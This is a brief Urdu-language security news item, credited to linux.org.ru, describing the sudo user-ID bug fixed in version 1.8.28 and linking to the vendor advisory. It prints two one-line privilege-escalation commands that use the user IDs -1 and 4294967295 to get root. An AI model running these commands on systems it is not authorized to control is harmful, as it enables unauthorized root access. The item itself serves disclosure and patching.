sudo میں کمزوری

sudo میں ایک بگ آپ کو کسی بھی قابل عمل فائل کو روٹ کے طور پر چلانے کی اجازت دیتا ہے اگر /etc/sudoers اسے دوسرے صارفین کے ذریعہ انجام دینے کی اجازت دیتا ہے اور روٹ کے لئے ممنوع ہے۔

غلطی کا استحصال بہت آسان ہے:

sudo -u#-1 id -u

یا:

sudo -u#4294967295 id -u

خرابی 1.8.28 سے پہلے sudo کے تمام ورژن میں موجود ہے۔

تفصیلات:

https://thehackernews.com/2019/10/linux-sudo-run-as-root-flaw.html

https://www.sudo.ws/alerts/minus_1_uid.html

ماخذ: linux.org.ru